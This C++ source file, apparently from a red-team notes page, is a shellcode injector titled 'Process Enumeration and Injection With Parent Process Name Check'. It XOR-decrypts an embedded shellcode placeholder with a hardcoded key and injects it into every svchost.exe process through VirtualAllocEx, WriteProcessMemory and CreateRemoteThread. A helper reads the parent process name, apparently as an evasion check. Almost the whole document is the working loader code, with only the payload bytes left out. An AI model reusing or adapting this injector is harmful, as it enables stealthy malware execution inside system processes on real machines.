Process Enumeration and Injection With Parent Process Name Check
#include <windows.h>
#include <string>
#include <iostream>
#include "Winbase.h"
#include <fstream>
#include <tlhelp32.h>
#include <psapi.h>
#include <locale>
#include <codecvt>
using namespace std;
string getppid()
{
int pid = -1;
int ppid = -1;
string ret = "";
HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe = { 0 };
pe.dwSize = sizeof(PROCESSENTRY32);
LPSTR filename[MAX_PATH];
HANDLE processHandle = NULL;
//assume first arg is the PID to get the PPID for, or use own PID
pid = GetCurrentProcessId();
if (Process32First(h, &pe)) {
do {
if (pe.th32ProcessID == pid) {
ppid = pe.th32ParentProcessID;
printf("PID: %i; PPID: %i\n", pid, pe.th32ParentProcessID);
//printf("Name: %i\n", pe.szExeFile);
wcout << pe.szExeFile << "\n";
break;
//processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe.th32ParentProcessID);
//GetModuleFileNameEx(processHandle, NULL, filename, MAX_PATH);
//QueryFullProcessImageNameA(processHandle, NULL, *filename, NULL);
//GetProcessImageFileNameA(processHandle, *filename, MAX_PATH);
//CloseHandle(processHandle);
//cout << filename;
}
} while (Process32Next(h, &pe));
}
if (Process32First(h, &pe)) {
do {
if (pe.th32ProcessID == ppid)
{
printf("Parent PID: %i; Parent PPID: %i\n", ppid, pe.th32ParentProcessID);
//printf("Name: %i\n", pe.szExeFile);
//setup converter
using convert_type = std::codecvt_utf8<wchar_t>;
std::wstring_convert<convert_type, wchar_t> converter;
//use converter (.to_bytes: wstr->str, .from_bytes: str->wstr)
ret = converter.to_bytes(pe.szExeFile);
//wcout << pe.szExeFile << "\n";
break;
}
} while (Process32Next(h, &pe));
}
CloseHandle(h);
return ret;
}
int main(int argc, char* argv[])
{
unsigned char eShellcode[] =
//<Encrypted Shellcode here>
/*
char un[32];
DWORD buf = 32;
GetUserNameA(un, &buf);
char hn[32];
DWORD buf2 = 32;
GetComputerNameA(hn, &buf2);
*/
//std::string key = hn;
//std::string key = un;
std::string key = "whAAaA";
key = key + "424";
//getppid();
string test = getppid();
cout << test << " test" << "\n";
unsigned char shellcode[sizeof(eShellcode)];
for (int ii = 0; ii < key.length(); ii++) {
for (int i = 0; i < sizeof eShellcode; i++) {
shellcode[i] = eShellcode[i] ^ key[ii];
eShellcode[i] = shellcode[i];
}
}
for (int ii = 0; ii < key.length(); ii++) {
for (int i = 0; i < sizeof eShellcode;) {
shellcode[i] = eShellcode[i] ^ key[ii];
eShellcode[i] = shellcode[i];
i = i + 2;
}
}
unsigned char one[] = "\xfc";
std::memcpy(shellcode, one, 1);
//HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
LPCTSTR processName = TEXT("svchost.exe");
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(snapshot, &entry) == TRUE)
{
while (Process32Next(snapshot, &entry) == TRUE)
{
if (!lstrcmpi(entry.szExeFile, processName))
{
HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID);
if (processHandle != NULL) { //check fails to find valid injection, switch to checking createremotethread before breaking
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
//break;
}
}
}
}
CloseHandle(snapshot);
/*processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(proc))); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);*/
return 0;
}Last updated
Was this helpful?